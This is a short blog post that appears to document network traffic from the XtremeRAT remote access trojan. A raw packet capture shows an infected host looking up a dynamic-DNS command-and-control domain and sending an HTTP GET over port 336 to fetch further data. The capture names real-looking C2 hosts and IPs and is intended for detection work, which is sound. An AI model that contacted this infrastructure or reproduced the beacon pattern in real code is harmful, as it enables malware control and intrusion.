APT Like – XTremeRAT – Remote Access Trojan – Port 336 Traffic GET /1234567890.functions

By | June 18, 2015

………PV.z ……)..1………………….
2013-02-03 19:10:21.612693 IP 172.16.253.131.53 > 8.8.8.8.53: 47611+ A? shittway.zapto.org. (36)
E..@……………..5.5.,……………shittway.zapto.org…..
2013-02-03 19:10:21.612755 IP 172.16.253.131.53 > 4.2.2.2.53: 47611+ A? shittway.zapto.org. (36)
E..@……………..5.5.,……………shittway.zapto.org…..
2013-02-03 19:10:21.708585 IP 172.16.253.131.1046 > 197.163.56.70.336: Flags [S], seq 2370154844, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0..@…S,……8F…P.E.\….p……………
2013-02-03 19:10:22.114884 IP 172.16.253.131.1046 > 197.163.56.70.336: Flags [.], ack 1045510444, win 64240, length 0
E..(. @…S2……8F…P.E.]>Q9,P…Q…
2013-02-03 19:10:22.115180 IP 172.16.253.131.1046 > 197.163.56.70.336: Flags [P.], seq 0:323, ack 1, win 64240, length 323
E..k.!@…Q…….8F…P.E.]>Q9,P…*_..GET /1234567890.functions HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: shittway.zapto[.]org:336
Connection: Keep-Alive
Cache-Control: no-cache

2013-02-03 19:10:22.731970 IP 172.16.253.131.1046 > 197.163.56.70.336: Flags [.], ack 2457, win 64240, length 0
E..(.%@…S-……8F…P.E..>QB.P…G…
2013-02-03 19:10:23.217068 IP 172.16.253.131.1046 > 197.163.56.70.336: Flags [.], ack 4913, win 64240, length 0
E..(.(@…S*……8F…P.E..>QL\P…=l..
2013-02-03 19:10:23.302765 IP 172.16.253.131.1046 > 197.163.56.70.336: Flags [.], ack 7369, win 64240, length 0
E..(.+@…S’……8F…P.E..>QU.P…3…
2013-02-03 19:10:23.662890 IP 172.16.253.131.1046 > 197.163.56.70.336: Flags [.], ack 9825, win 64240, length 0
E..(..@…S$……8F…P.E..>Q_.P…*<.. 2013-02-03 19:10:23.746115 IP 172.16.253.131.1046 > 197.163.56.70.336: Flags [.], ack 12281, win 64240, length 0
E..(.1@…S!……8F…P.E..>Qi$P… …
2013-02-03 19:10:23.828537 IP 172.16.253.131.1046 > 197.163.56.70.336: Flags [.], ack 14737, win 64240, length 0
E..(.4@…S…….8F…P.E..>Qr.P…….
2013-02-03 19:10:23.912906 IP 172.16.253.131.1046 > 197.163.56.70.336: Flags [.], ack 17193, win 64240, length 0
E..(.7@…S…….8F…P.E..>Q|TP….t..
2013-02-03 19:10:24.141726 IP 172.16.253.131.1046 > 197.163.56.70.336: Flags [.], ack 19649, win 64240, length 0
E..(.:@…S…….8F…P.E..>Q..P…….
2013-02-03 19:10:24.226939 IP 172.16.253.131.1046 > 197.163.56.70.336: Flags [.], ack 22105, win 64240, length 0
E..(.=@…S…….8F…P.E..>Q..P….C..
2013-02-03 19:10:24.308474 IP 172.16.253.131.1046 > 197.163.56.70.336: Flags [.], ack 24561, win 64240, length 0
E..(.@@…S…….8F…P.E..>Q..P…….
2013-02-03 19:10:24.393512 IP 172.16.253.131.1046 > 197.163.56.70.336: Flags [.], ack 27017, win 64240, length 0
E..(.C@…S…….8F…P.E..>Q..P…….
2013-02-03 19:10:24.474892 IP 172.16.253.131.1046 > 197.163.56.70.336: Flags [.], ack 29473, win 64240, length 0
E..(.F@…S…….8F…P.E..>Q.LP….{..
2013-02-03 19:10:24.557932 IP 172.16.253.131.1046 > 197.163.56.70.336: Flags [.], ack 31929, win 64240, length 0
E..(.I@…S ……8F…P.E..>Q..P…….
2013-02-03 19:10:24.641400 IP 172.16.253.131.1046 > 197.163.56.70.336: Flags [.], ack 34385, win 64240, length 0
E..(.L@…S…….8F…P.E..>Q.|P….K..
2013-02-03 19:10:24.725255 IP 172.16.253.131.1046 > 197.163.56.70.336: Flags [.], ack 36841, win 64240, length 0
E..(.O@…S…….8F…P.E..>Q..P…….
2013-02-03 19:10:24.808259 IP 172.16.253.131.1046 > 197.163.56.70.336: Flags [.], ack 39297, win 64240, length 0
E..(.R@…S…….8F…P.E..>Q..P…….
2013-02-03 19:10:24.891069 IP 172.16.253.131.1046 > 197.163.56.70.336: Flags [.], ack 41753, win 64240, length 0
E..(.U@…R…….8F…P.E..>Q.DP…….
2013-02-03 19:10:24.975803 IP 172.16.253.131.1046 > 197.163.56.70.336: Flags [.], ack 44209, win 64240, length 0
E..(.X@…R…….8F…P.E..>Q..P…….

Share Button

Leave a Reply

Your email address will not be published. Required fields are marked *